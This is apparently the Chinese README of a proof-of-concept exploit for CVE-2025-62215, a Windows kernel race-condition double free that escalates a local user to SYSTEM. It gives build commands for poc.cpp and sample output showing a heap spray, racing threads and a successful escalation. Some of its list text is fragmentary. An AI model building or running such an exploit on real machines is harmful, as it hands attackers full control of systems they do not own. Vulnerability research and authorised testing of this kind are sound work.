原始代码来源:https://github.com/dexterm300
本仓库包含针对 CVE-2025-62215 的概念验证漏洞利用代码,这是 Windows 内核中的一个竞态条件漏洞,可通过并发操作内核对象句柄来触发。在特定条件下,这会导致双重释放,进而可利用该漏洞实现向 SYSTEM 的本地权限提升。
该漏洞利用通过以下方式工作:
本代码仅用于教育和授权的安全测试目的。在生产系统上或在未经明确许可的情况下运行严格禁止。
cl.exe(MSVC)即可干净构建/MDd)的 MSVC(cl.exe)编译器ntdll.dll,用于直接系统调用绑定Debug x64可能需要安装 C++ 构建工具:https://visualstudio.microsoft.com/visual-cpp-build-tools/ & "C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"
cl.exe poc.cpp /Od /ZI /RTC1 /MDd /link /OUT:unicorn.exe
[*] Starting CVE-2025-62215 exploitation...
[*] Performing heap spray...
[+] Allocated 100 heap chunks
[*] Spawning 8 threads to trigger race condition...
[*] Waiting for race condition...
[+] SUCCESS: Privilege escalation detected!
[+] EXPLOITATION SUCCESSFUL!
[+] Privileges escalated to SYSTEM